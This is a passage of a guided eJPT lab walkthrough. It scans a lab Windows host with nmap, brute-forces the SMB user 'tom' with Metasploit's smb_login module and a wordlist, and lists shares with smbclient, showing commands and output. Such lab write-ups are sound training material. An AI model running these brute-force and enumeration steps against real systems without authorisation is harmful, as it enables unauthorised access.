Host & Network Penetration Testing: Exploitation CTF 2

Welcome to the Exploitation CTF 2 lab of the eJPT course. This will be a guided walkthrough. Let’s get started!

Attacker IP: 10.10.40.2

Target IP: 10.3.29.184

Flag 1: Looks like smb user tom has not changed his password from a very long time.

So we have an smb user that sounds like he has a weak password. Let’s run our nmap scan and get started.

nmap -sV -sC 10.3.29.184

Starting Nmap 7.94SVN ( <https://nmap.org> ) at 2026-01-15 02:21 IST
Nmap scan report for target.ine.local (10.3.29.184)
Host is up (0.0029s latency).
Not shown: 989 closed tcp ports (reset)
PORT      STATE SERVICE            VERSION

21/tcp    open  ftp                Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT

80/tcp    open  http               Microsoft IIS httpd 8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server

135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?

3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: WIN-M878Q9NE9S6
|   NetBIOS_Domain_Name: WIN-M878Q9NE9S6
|   NetBIOS_Computer_Name: WIN-M878Q9NE9S6
|   DNS_Domain_Name: WIN-M878Q9NE9S6
|   DNS_Computer_Name: WIN-M878Q9NE9S6
|   Product_Version: 6.3.9600
|_  System_Time: 2026-01-14T20:52:33+00:00
| ssl-cert: Subject: commonName=WIN-M878Q9NE9S6
| Not valid before: 2026-01-13T20:39:15
|_Not valid after:  2026-07-15T20:39:15
|_ssl-date: 2026-01-14T20:52:41+00:00; 0s from scanner time.

49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49167/tcp open  msrpc              Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:0:2: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2026-01-14T20:52:38
|_  start_date: 2026-01-14T20:39:13

We notice quite a few ports and services running but we’re going to focus on enumerating the smb user more since that’s what the task is focused on.

We can use metasploit to bruteforce the smb user tom for access. Let’s start up metasploit and search for the module smb_login. We’ll need to set a few options and then run the exploit

service postgresql start && msfconsole -q

search smb_login

use 0
setg RHOSTS 10.3.29.184
set SMBUser tom
set PASS_FILE /usr/share/wordlists/metasploit/unix_passwords.txt
exploit

[+] 10.3.29.184:445       - 10.3.29.184:445 - Success: '.\\tom:felipe'

Great, it worked. We found the password felipe for user tom. Let’s see where we can get with these.

smbclient -L \\\\\\\\target.ine.local -U tom
Password for [WORKGROUP\\tom]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        D$              Disk      Default share
        HRDocuments     Disk      
        IPC$            IPC       Remote IPC
        ITResources     Disk      
        print$          Disk      Printer Drivers